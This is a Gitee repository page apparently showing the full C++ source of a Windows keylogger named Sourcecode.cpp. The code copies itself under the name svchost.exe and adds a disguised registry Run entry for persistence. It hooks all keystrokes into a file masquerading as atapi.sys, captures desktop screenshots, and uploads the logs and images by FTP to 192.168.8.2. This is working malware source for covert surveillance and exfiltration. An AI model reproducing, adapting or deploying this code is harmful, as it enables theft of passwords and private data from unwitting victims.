1 Star 0 Fork 0

wedojava/ajayrandhawaKeylogger

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
文件
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
Sourcecode.cpp 32.68 KB
一键复制 编辑 原始数据 按行查看 历史
Ajay Randhawa 提交于 2018-08-19 22:03 . Add files via upload
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717718719720721722723724725726727728729730731732733734735736737738739740741742743744745746747748749750751752753754755756757758759760761762763764765766767768769770771772773774775776777778779780781782783784785786787788789790791792793794795796797798799800801802803804805806807808809810811812813814815816817818819820821822823824825826827828829830831832833834835836837838839840841842
#include <stdio.h>
#include <string>
#include <windows.h>
#include <wininet.h>
#include <winuser.h>
#include <conio.h>
#include <time.h>
#include <fstream>
#include <strsafe.h>
#include <io.h>
#include <crtdefs.h>
#include <fstream>
#include <GdiPlus.h>
using namespace Gdiplus;
using namespace std;
#pragma comment(lib,"Wininet.lib")
#pragma comment (lib,"gdiplus.lib")
fstream log_error_file("log_error.txt",ios::app);
string userlc;
void userpath(){
char szDir[260];
// GetTempPath(260,szDir);
GetEnvironmentVariable("APPDATA",szDir,260);
userlc = szDir;
userlc += "\\WPDNSE\\";
log_error_file<<userlc<<"\n";
log_error_file.close();
}
void screenshot(string file){
ULONG_PTR gdiplustoken;
GdiplusStartupInput gdistartupinput;
GdiplusStartupOutput gdistartupoutput;
gdistartupinput.SuppressBackgroundThread = true;
GdiplusStartup(& gdiplustoken,& gdistartupinput,& gdistartupoutput); //start GDI+
HDC dc=GetDC(GetDesktopWindow());//get desktop content
HDC dc2 = CreateCompatibleDC(dc); //copy context
RECT rc0kno;
GetClientRect(GetDesktopWindow(),&rc0kno);// get desktop size;
int w = rc0kno.right-rc0kno.left;//width
int h = rc0kno.bottom-rc0kno.top;//height
HBITMAP hbitmap = CreateCompatibleBitmap(dc,w,h);//create bitmap
HBITMAP holdbitmap = (HBITMAP) SelectObject(dc2,hbitmap);
BitBlt(dc2, 0, 0, w, h, dc, 0, 0, SRCCOPY);//copy pixel from pulpit to bitmap
Bitmap* bm= new Bitmap(hbitmap,NULL);
UINT num;
UINT size;
ImageCodecInfo *imagecodecinfo;
GetImageEncodersSize(&num,&size); //get count of codec
imagecodecinfo = (ImageCodecInfo*)(malloc(size));
GetImageEncoders (num,size,imagecodecinfo);//get codec
CLSID clsidEncoder;
for(int i=0; i < num; i++)
{
if(wcscmp(imagecodecinfo[i].MimeType,L"image/jpeg")==0)
clsidEncoder = imagecodecinfo[i].Clsid;//get jpeg codec id
}
free(imagecodecinfo);
wstring ws;
ws.assign(file.begin(),file.end());//sring to wstring
bm->Save(ws.c_str(),& clsidEncoder); //save in jpeg format
SelectObject(dc2,holdbitmap);//Release Objects
DeleteObject(dc2);
DeleteObject(hbitmap);
ReleaseDC(GetDesktopWindow(),dc);
GdiplusShutdown(gdiplustoken);
}
void ftp_scrshot_send(){
HINTERNET hInternet;
HINTERNET hFtpSession;
DWORD rec_timeout = 5000;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(hInternet == NULL){
log_error_file<<"Error:"<<GetLastError();
}
else{
hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));
if(hFtpSession == NULL){
log_error_file<<"Error:"<<GetLastError();
}
else{
if(!FtpPutFile(hFtpSession,"core32.mni","hacks/sc/dc.jpg",FTP_TRANSFER_TYPE_BINARY,0)){
log_error_file<<"Error:"<<GetLastError();
}
}
}
log_error_file.close();
}
void ftplogsend(){
HINTERNET hInternet;
HINTERNET hFtpSession;
DWORD rec_timeout = 2000;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if(hInternet == NULL){
log_error_file<<"Error:"<<GetLastError();
}
else{
hFtpSession = InternetConnect(hInternet,"192.168.8.2",2121,NULL,NULL,INTERNET_SERVICE_FTP,0,0);
InternetSetOption(hInternet,INTERNET_OPTION_SEND_TIMEOUT,&rec_timeout,sizeof(rec_timeout));
if(hFtpSession == NULL){
log_error_file<<"Error:"<<GetLastError();
}
else{
if(!FtpPutFile(hFtpSession,"atapi.sys","hacks/hacks.txt",FTP_TRANSFER_TYPE_BINARY,0)){
log_error_file<<"Error:"<<GetLastError();
log_error_file.close();
}
}
}
}
void AutoCopy(){
string f_path = userlc;
string f_name=f_path;
f_name+="\\svchost.exe";//file name
char my_name[260];
GetModuleFileName(GetModuleHandle(0),my_name,260);//name of running process
string f_my=my_name;
CreateDirectory(f_path.c_str(),NULL);
CopyFile(f_my.c_str(),f_name.c_str(),FALSE);
}
void Install(){
SYSTEMTIME st;
GetLocalTime(&st);
int year = st.wYear;
int month = st.wMonth;
int day = st.wDay;
int hour = st.wHour;
int mintue = st.wMinute;
string yearS = to_string(year);
yearS += "_";
string monthS = to_string(month);
monthS += "-";
string dayS = to_string(day);
dayS += "-";
string hourS = to_string(hour);
hourS += "H-";
string mintueS = to_string(mintue);
mintueS += "M------------>\n\n";
string startDate = "\n\n";
startDate += dayS + monthS + yearS + hourS + mintueS;
char dateCh[260];
strcpy(dateCh,startDate.c_str());
string ff_path = userlc;
char szDir[260];
strcpy(szDir,ff_path.c_str());
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
fputs(dateCh,file);
fclose(file);
}
int isCapsLock()
{
if ((GetKeyState(VK_CAPITAL) & 0x0001) != 0)
{
return 1;
}
else
{
return 0;
}
}
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKeyBoard = (KBDLLHOOKSTRUCT *)lParam;
DWORD dwMsg = 1;
string ff_path = userlc;
char szDir[260];
strcpy(szDir,ff_path.c_str());
strcat(szDir,"atapi.sys");
FILE *file;
file = fopen(szDir, "a+");
DWORD dwAttrs = GetFileAttributesA(szDir);
// if (dwAttrs!= (FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN))
// SetFileAttributesA(szDir, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN);
switch (wParam)
{
case WM_KEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_SHIFT))
{
switch (vkCode)
{
case 0x30:
fputs("[)]", file);
break;
case 0x31:
fputs("[!]", file);
break;
case 0x32:
fputs("[@]", file);
break;
case 0x33:
fputs("[#]", file);
break;
case 0x34:
fputs("[$]", file);
break;
case 0x35:
fputs("[%]", file);
break;
case 0x36:
fputs("[^]", file);
break;
case 0x37:
fputs("[&]", file);
break;
case 0x38:
fputs("[*]", file);
break;
case 0x39:
fputs("[(]", file);
break;
case 0xBF:
fputs("[?]", file); ///
break;
case 0xBB:
fputs("[+]", file);
break;
case 0xBE:
fputs("[<]", file);
break;
case 0xBD:
fputs("[_]", file);
break;
case 0xE2:
fputs("[>]", file);
break;
case 0x1C:
fputs("[VK_CONVERT]",file);
break;
case 0x56:
fputs("[@]", file);
break;
case 0x2A:
fputs ("[PRINT]",file);
break;
case 0x2E:
fputs ("[Delete]",file);
break;
case 0xAA:
fputs("[Search]",file);
break;
case 0xF2:
fputs("[Copy]",file);
break;
case 0xFE:
fputs("[Clear]",file);
break;
case 0x3:
fputs("[Connect]",file);
break;
case 0x6:
fputs("[Logoff]",file);
break;
}
}
else
{
switch (vkCode)
{
case 0x30:
fputs("0", file);
break;
case 0x31:
fputs("1", file);
break;
case 0x32:
fputs("2", file);
break;
case 0x33:
fputs("3", file);
break;
case 0x34:
fputs("4", file);
break;
case 0x35:
fputs("5", file);
break;
case 0x36:
fputs("6", file);
break;
case 0x37:
fputs("7", file);
break;
case 0x38:
fputs("8", file);
break;
case 0x39:
fputs("9", file);
break;
case 0xBF:
fputs("/", file);
break;
case 0xBB:
fputs("=", file);
break;
case 0xBC:
fputs(",", file);
break;
case 0xBE:
fputs(".", file);
break;
case 0xBD:
fputs("-", file);
break;
case 0xE2:
fputs("<", file);
break;
}
}
if (!(GetAsyncKeyState(VK_SHIFT)))
{
switch (vkCode)
{
case 0x41:
fputs("a", file);
break;
case 0x42:
fputs("b", file);
break;
case 0x43:
fputs("c", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("d", file);
break;
case 0x45:
fputs("e", file);
break;
case 0x46:
fputs("f", file);
break;
case 0x47:
fputs("g", file);
break;
case 0x48:
fputs("h", file);
break;
case 0x49:
fputs("i", file);
break;
case 0x4A:
fputs("j", file);
break;
case 0x4B:
fputs("k", file);
break;
case 0x4C:
fputs("l", file);
break;
case 0x4D:
fputs("m", file);
break;
case 0x4E:
fputs("n", file);
break;
case 0x4F:
fputs("o", file);
break;
case 0x50:
fputs("p", file);
break;
case 0x52:
fputs("r", file);
break;
case 0x53:
fputs("s", file);
break;
case 0x54:
fputs("t", file);
break;
case 0x55:
fputs("u", file);
break;
case 0x56:
fputs("v", file);
break;
case 0x5A:
fputs("z", file);
break;
case 0xDC:
fputs("\\", file);
break;
case 0x51:
fputs("q", file);
break;
case 0x57:
fputs("w", file);
break;
case 0x59:
fputs("y", file);
break;
case 0x58:
fputs("x", file);
break;
case 0xDE:
fputs("ć", file);
break;
case 0xDD:
fputs("đ", file);
break;
default:
fputs(" ", file);
}
}
if ((GetAsyncKeyState(VK_SHIFT)))
{
switch (vkCode)
{
case 0x41:
fputs("A", file);
break;
case 0x42:
fputs("B", file);
break;
case 0x43:
fputs("C", file);
break;
case 0xBA:
fputs("č", file);
break;
case 0x44:
fputs("D", file);
break;
case 0x45:
fputs("E", file);
break;
case 0x46:
fputs("F", file);
break;
case 0x47:
fputs("G", file);
break;
case 0x48:
fputs("H", file);
break;
case 0x49:
fputs("I", file);
break;
case 0x4A:
fputs("J", file);
break;
case 0x4B:
fputs("K", file);
break;
case 0x4C:
fputs("L", file);
break;
case 0x4D:
fputs("M", file);
break;
case 0x4E:
fputs("N", file);
break;
case 0x4F:
fputs("O", file);
break;
case 0x50:
fputs("P", file);
break;
case 0x52:
fputs("R", file);
break;
case 0x53:
fputs("S", file);
break;
case 0x54:
fputs("T", file);
break;
case 0x55:
fputs("U", file);
break;
case 0x56:
fputs("V", file);
break;
case 0x5A:
fputs("Z", file);
break;
case 0x51:
fputs("Q", file);
break;
case 0x57:
fputs("W", file);
break;
case 0x59:
fputs("Y", file);
break;
case 0x58:
fputs("X", file);
break;
default:
fputs(" ", file);
}
}
else VK_SHIFT + KF_ALTDOWN ;
switch (vkCode)
{
case VK_SPACE:
fputs("[Space]", file);
break;
case 0x2E:
fputs("[Delete]", file);
break;
case VK_BACK:
fputs("[BackSpace]", file);
break;
case VK_RETURN:
fputs("[Enter]\n", file);
break;
case VK_LCONTROL:
fputs("[Ctrl]", file);
break;
case VK_RCONTROL:
fputs("[Ctrl]", file);
break;
case VK_TAB:
fputs("[Tab]", file);
break;
case 0x25:
fputs("[Left Arrow]", file);
break;
case 0x26:
fputs("[Up Arrow]", file);
break;
case 0x27:
fputs("[Right Arrow]", file);
break;
case 0x28:
fputs("[Down Arrow]", file);
break;
case VK_ESCAPE:
fputs("[Esc]", file);
break;
case VK_CAPITAL:
fputs("[Caps Lock]", file);
break;
case VK_RSHIFT:
fputs("[Right Shift]", file);
break;
case VK_LSHIFT:
fputs("[Left Shift]", file);
break;
case VK_LMENU:
fputs("[Left Alt]", file);
break;
case VK_RMENU:
fputs("[Right Alt]", file);
break;
case VK_LWIN:
fputs("[Left Win]", file);
break;
case VK_RWIN:
fputs("[Right Win]", file);
break;
case VK_INSERT:
fputs("[Insert]", file);
break;
case VK_SCROLL:
fputs("[Scroll Lock]", file);
break;
case VK_HOME:
fputs("[Home]", file);
break;
case VK_END:
fputs("[End]", file);
break;
case VK_PRIOR:
fputs("[Page Up]", file);
break;
case VK_NEXT:
fputs("[Page Down]", file);
break;
case VK_SNAPSHOT:
fputs("[Print Screen]", file);
break;
case VK_OEM_3:
fputs("[ ~ ` ]", file);
break;
case VK_OEM_4:
fputs("[ { [ ]", file);
break;
case VK_OEM_6:
fputs("[ } ] ]", file);
break;
case VK_OEM_1:
fputs("[ : ; ]", file);
break;
case VK_OEM_7:
fputs("[ \" ' ]", file);
break;
case VK_F1:
fputs("[F1]", file);
break;
case VK_F2:
fputs("[F2]", file);
break;
case VK_F3:
fputs("[F3]", file);
break;
case VK_F4:
fputs("[F4]", file);
break;
case VK_F5:
fputs("[F5]", file);
break;
case VK_F6:
fputs("[F6]", file);
break;
case VK_F7:
fputs("[F7]", file);
break;
case VK_F8:
fputs("[F8]", file);
break;
case VK_F9:
fputs("[F9]", file);
break;
case VK_F10:
fputs("[F10]", file);
break;
case VK_F11:
fputs("[F11]", file);
break;
case VK_F12:
fputs("[F12]", file);
break;
case VK_NUMPAD0:
fputs("0", file);
break;
case VK_NUMPAD1:
fputs("1", file);
break;
case VK_NUMPAD2:
fputs("2", file);
break;
case VK_NUMPAD3:
fputs("3", file);
break;
case VK_NUMPAD4:
fputs("4", file);
break;
case VK_NUMPAD5:
fputs("5", file);
break;
case VK_NUMPAD6:
fputs("6", file);
break;
case VK_NUMPAD7:
fputs("7", file);
break;
case VK_NUMPAD8:
fputs("8", file);
break;
case VK_NUMPAD9:
fputs("9", file);
break;
case 0x6F:
fputs("[/]", file);
break;
case 0x6A:
fputs("[*]", file);
break;
case 0x6D:
fputs("[-]", file);
break;
case 0x6B:
fputs("[+]", file);
break;
case 0x6E:
fputs("[,]", file);
break;
}
}
case WM_SYSKEYDOWN:
{
DWORD vkCode = pKeyBoard->vkCode;
if (GetAsyncKeyState(VK_RSHIFT))
{
switch (vkCode)
{
case 0x51:
fputs("[\\]", file);
break;
case 0x57:
fputs("[|]", file);
break;
case 0xDB:
fputs("[{]", file);
break;
case 0xDD:
fputs("[}]", file);
break;
case 0xDC:
fputs("[|]", file);
break;
case 0x56:
fputs("[@]", file);
break;
case 0xBE:
fputs("[>]", file);
break;
}
}
}
default:
fclose(file);
return CallNextHookEx( NULL, nCode, wParam, lParam );
}
fclose(file);
return 0;
}
DWORD WINAPI KeyLogger(LPVOID lpParameter)
{
HHOOK hKeyHook;
HINSTANCE hExe = GetModuleHandle(NULL);
if (hExe == NULL)
{
return 1;
}
else
{
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, hExe, 0);
MSG msg;
while (GetMessage(&msg, NULL, 0, 0) != 0)
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
UnhookWindowsHookEx(hKeyHook);
}
return 0;
}
int StartKeyLogging()
{
HANDLE hThread;
DWORD dwThread;
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)KeyLogger,NULL, 0, NULL);
if (hThread)
{
return WaitForSingleObject(hThread, INFINITE);
}
else
{
return 1;
}
}
void AutoStart()
{
char Driver[MAX_PATH];
HKEY hKey;
string ff_path = userlc + "svchost.exe";
strcpy(Driver,ff_path.c_str());
RegOpenKeyExA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
RegSetValueExA(hKey, "Windows Atapi x86_64 Driver", 0, REG_SZ, (const unsigned char *)Driver, MAX_PATH);
RegCloseKey(hKey);
}
int WINAPI wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PWSTR pCmdLine, int nCmdShow)
{
userpath();
AutoCopy(); //autocopy
AutoStart(); // auto start everytime
Sleep(1000*60*1);
Install(); // write log date
screenshot("core32.mni");
ftp_scrshot_send();
ftplogsend();
StartKeyLogging();
}
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化
1
https://gitee.com/wedojava/ajayrandhawa-keylogger.git
git@gitee.com:wedojava/ajayrandhawa-keylogger.git
wedojava
ajayrandhawa-keylogger
ajayrandhawaKeylogger
master

搜索帮助

0d507c66 1850385 C8b1a773 1850385